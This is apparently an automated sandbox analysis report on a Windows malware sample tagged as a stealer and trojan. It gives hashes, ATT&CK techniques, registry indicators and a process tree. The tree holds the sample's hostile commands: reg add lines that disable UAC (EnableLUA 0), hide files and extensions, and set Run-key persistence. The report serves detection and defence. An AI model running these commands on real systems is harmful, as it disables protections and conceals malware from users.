fc688d6e94195b6a2d13e4c09c23384a822375cbdba0032e3aeee2bb6c765c77

Analysis

max time kernel
11s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
25-12-2023 13:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2288274507c221f12776ff15b93d303a.exe
Size

484KB
MD5

2288274507c221f12776ff15b93d303a
SHA1

e455a4f5785a0cfcaf35be4ece87f44e708341ed
SHA256

fc688d6e94195b6a2d13e4c09c23384a822375cbdba0032e3aeee2bb6c765c77
SHA512

58f2b40879d3bee2badfe5f08af2ec65c5f5ad0e4e6a2c31f0cd0a3c0dd9d52523cfb0c70f15b3d6ea34ff606aec9ca7705a178fa93d1f5c86a55a91b657dbf4
SSDEEP

12288:08oOHceJryOy5EIJ4FWc4CB+Hik0dMmfrrYo6lZUqWF:08ojOtIiArCB+CkM7rrZ6o

Score

10^/10

evasion persistence spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 34 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe

UAC bypass 3 TTPs 33 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2288274507c221f12776ff15b93d303a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2288274507c221f12776ff15b93d303a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
2248	jeUYkMEU.exe
3968	HWowAAck.exe
112	JWQgwcQA.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\HWowAAck.exe = "C:\\ProgramData\\MUgIsEoQ\\HWowAAck.exe"	JWQgwcQA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\HWowAAck.exe = "C:\\ProgramData\\MUgIsEoQ\\HWowAAck.exe"	HWowAAck.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jeUYkMEU.exe = "C:\\Users\\Admin\\YGcEkYQk\\jeUYkMEU.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\HWowAAck.exe = "C:\\ProgramData\\MUgIsEoQ\\HWowAAck.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jeUYkMEU.exe = "C:\\Users\\Admin\\YGcEkYQk\\jeUYkMEU.exe"	jeUYkMEU.exe

Checks whether UAC is enabled 1 TTPs 12 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2288274507c221f12776ff15b93d303a.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2288274507c221f12776ff15b93d303a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2288274507c221f12776ff15b93d303a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2288274507c221f12776ff15b93d303a.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\YGcEkYQk\jeUYkMEU	JWQgwcQA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\YGcEkYQk	JWQgwcQA.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
1216	reg.exe
4232	reg.exe
4204	reg.exe
1308	reg.exe
2160	reg.exe
4216	reg.exe
1188	reg.exe
4872	reg.exe
548	reg.exe
4200	reg.exe
548	reg.exe
4360	reg.exe
3428	reg.exe
4860	reg.exe
1272	reg.exe
1344	reg.exe
1020	reg.exe
2872	reg.exe
1476	reg.exe
2660	reg.exe
2768	reg.exe
1768	reg.exe
1272	reg.exe
5044	reg.exe
3604	reg.exe
684	reg.exe
4624	reg.exe
4356	reg.exe
3880	reg.exe
1188	reg.exe
2132	reg.exe
4084	reg.exe
972	reg.exe
764	reg.exe
64	reg.exe
4216	reg.exe
3576	reg.exe
3008	reg.exe
752	reg.exe
3772	reg.exe
2012	reg.exe
4876	reg.exe
5108	reg.exe
3772	reg.exe
4776	reg.exe
3188	reg.exe
2896	reg.exe
1560	reg.exe
2808	reg.exe
4936	reg.exe
1968	reg.exe
3348	reg.exe
380	reg.exe
1692	reg.exe
4316	reg.exe
1208	reg.exe
3308	reg.exe
1696	reg.exe
4704	reg.exe
4692	reg.exe
1768	reg.exe
1068	reg.exe
2012	reg.exe
4680	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1208	2288274507c221f12776ff15b93d303a.exe
1208	reg.exe
1208	reg.exe
1208	reg.exe
1280	cmd.exe
1280	cmd.exe
1280	cmd.exe
1280	cmd.exe
3800	cmd.exe
3800	cmd.exe
3800	cmd.exe
3800	cmd.exe
4884	2288274507c221f12776ff15b93d303a.exe
4884	2288274507c221f12776ff15b93d303a.exe
4884	2288274507c221f12776ff15b93d303a.exe
4884	2288274507c221f12776ff15b93d303a.exe
1160	2288274507c221f12776ff15b93d303a.exe
1160	2288274507c221f12776ff15b93d303a.exe
1160	2288274507c221f12776ff15b93d303a.exe
1160	2288274507c221f12776ff15b93d303a.exe
3880	2288274507c221f12776ff15b93d303a.exe
3880	2288274507c221f12776ff15b93d303a.exe
3880	2288274507c221f12776ff15b93d303a.exe
3880	2288274507c221f12776ff15b93d303a.exe
1080	2288274507c221f12776ff15b93d303a.exe
1080	2288274507c221f12776ff15b93d303a.exe
1080	2288274507c221f12776ff15b93d303a.exe
1080	2288274507c221f12776ff15b93d303a.exe
1584	reg.exe
1584	reg.exe
1584	reg.exe
1584	reg.exe
856	2288274507c221f12776ff15b93d303a.exe
856	2288274507c221f12776ff15b93d303a.exe
856	2288274507c221f12776ff15b93d303a.exe
856	2288274507c221f12776ff15b93d303a.exe
1968	cscript.exe
1968	cscript.exe
1968	cscript.exe
1968	cscript.exe
2132	reg.exe
2132	reg.exe
2132	reg.exe
2132	reg.exe
3780	Conhost.exe
3780	Conhost.exe
3780	Conhost.exe
3780	Conhost.exe
4764	2288274507c221f12776ff15b93d303a.exe
4764	2288274507c221f12776ff15b93d303a.exe
4764	2288274507c221f12776ff15b93d303a.exe
4764	2288274507c221f12776ff15b93d303a.exe
4048	2288274507c221f12776ff15b93d303a.exe
4048	2288274507c221f12776ff15b93d303a.exe
4048	2288274507c221f12776ff15b93d303a.exe
4048	2288274507c221f12776ff15b93d303a.exe
4240	2288274507c221f12776ff15b93d303a.exe
4240	2288274507c221f12776ff15b93d303a.exe
4240	2288274507c221f12776ff15b93d303a.exe
4240	2288274507c221f12776ff15b93d303a.exe
2344	reg.exe
2344	reg.exe
2344	reg.exe
2344	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1208 wrote to memory of 2248	1208	reg.exe	1262
PID 1208 wrote to memory of 2248	1208	reg.exe	1262
PID 1208 wrote to memory of 2248	1208	reg.exe	1262
PID 1208 wrote to memory of 3968	1208	reg.exe	1261
PID 1208 wrote to memory of 3968	1208	reg.exe	1261
PID 1208 wrote to memory of 3968	1208	reg.exe	1261
PID 1208 wrote to memory of 3088	1208	reg.exe	1259
PID 1208 wrote to memory of 3088	1208	reg.exe	1259
PID 1208 wrote to memory of 3088	1208	reg.exe	1259
PID 3088 wrote to memory of 1280	3088	cmd.exe	1157
PID 3088 wrote to memory of 1280	3088	cmd.exe	1157
PID 3088 wrote to memory of 1280	3088	cmd.exe	1157
PID 1208 wrote to memory of 2360	1208	reg.exe	1258
PID 1208 wrote to memory of 2360	1208	reg.exe	1258
PID 1208 wrote to memory of 2360	1208	reg.exe	1258
PID 1208 wrote to memory of 4204	1208	reg.exe	1257
PID 1208 wrote to memory of 4204	1208	reg.exe	1257
PID 1208 wrote to memory of 4204	1208	reg.exe	1257
PID 1208 wrote to memory of 4808	1208	reg.exe	1256
PID 1208 wrote to memory of 4808	1208	reg.exe	1256
PID 1208 wrote to memory of 4808	1208	reg.exe	1256
PID 1280 wrote to memory of 5088	1280	cmd.exe	1255
PID 1280 wrote to memory of 5088	1280	cmd.exe	1255
PID 1280 wrote to memory of 5088	1280	cmd.exe	1255
PID 5088 wrote to memory of 3800	5088	cmd.exe	1103
PID 5088 wrote to memory of 3800	5088	cmd.exe	1103
PID 5088 wrote to memory of 3800	5088	cmd.exe	1103
PID 1280 wrote to memory of 1772	1280	cmd.exe	1253
PID 1280 wrote to memory of 1772	1280	cmd.exe	1253
PID 1280 wrote to memory of 1772	1280	cmd.exe	1253
PID 1280 wrote to memory of 2872	1280	cmd.exe	1252
PID 1280 wrote to memory of 2872	1280	cmd.exe	1252
PID 1280 wrote to memory of 2872	1280	cmd.exe	1252
PID 1280 wrote to memory of 2220	1280	cmd.exe	1251
PID 1280 wrote to memory of 2220	1280	cmd.exe	1251
PID 1280 wrote to memory of 2220	1280	cmd.exe	1251
PID 1280 wrote to memory of 4816	1280	cmd.exe	1250
PID 1280 wrote to memory of 4816	1280	cmd.exe	1250
PID 1280 wrote to memory of 4816	1280	cmd.exe	1250
PID 4816 wrote to memory of 4412	4816	cmd.exe	1247
PID 4816 wrote to memory of 4412	4816	cmd.exe	1247
PID 4816 wrote to memory of 4412	4816	cmd.exe	1247
PID 3800 wrote to memory of 4376	3800	cmd.exe	1246
PID 3800 wrote to memory of 4376	3800	cmd.exe	1246
PID 3800 wrote to memory of 4376	3800	cmd.exe	1246
PID 4376 wrote to memory of 4884	4376	cmd.exe	1244
PID 4376 wrote to memory of 4884	4376	cmd.exe	1244
PID 4376 wrote to memory of 4884	4376	cmd.exe	1244
PID 3800 wrote to memory of 3632	3800	cmd.exe	1243
PID 3800 wrote to memory of 3632	3800	cmd.exe	1243
PID 3800 wrote to memory of 3632	3800	cmd.exe	1243
PID 3800 wrote to memory of 4364	3800	cmd.exe	1242
PID 3800 wrote to memory of 4364	3800	cmd.exe	1242
PID 3800 wrote to memory of 4364	3800	cmd.exe	1242
PID 3800 wrote to memory of 1640	3800	cmd.exe	1241
PID 3800 wrote to memory of 1640	3800	cmd.exe	1241
PID 3800 wrote to memory of 1640	3800	cmd.exe	1241
PID 3800 wrote to memory of 4372	3800	cmd.exe	1240
PID 3800 wrote to memory of 4372	3800	cmd.exe	1240
PID 3800 wrote to memory of 4372	3800	cmd.exe	1240
PID 4372 wrote to memory of 1036	4372	cmd.exe	1236
PID 4372 wrote to memory of 1036	4372	cmd.exe	1236
PID 4372 wrote to memory of 1036	4372	cmd.exe	1236
PID 4884 wrote to memory of 672	4884	2288274507c221f12776ff15b93d303a.exe	1263

System policy modification 1 TTPs 12 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2288274507c221f12776ff15b93d303a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	2288274507c221f12776ff15b93d303a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2288274507c221f12776ff15b93d303a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	2288274507c221f12776ff15b93d303a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
"C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1208

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1280

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:3800
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:3984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:3668
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2200

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:4384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:1272
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:3188

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:1584

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:3740

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:752
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:4372
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:4336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JqYgIcgI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:4680
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:4876

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1332

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1472

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4048
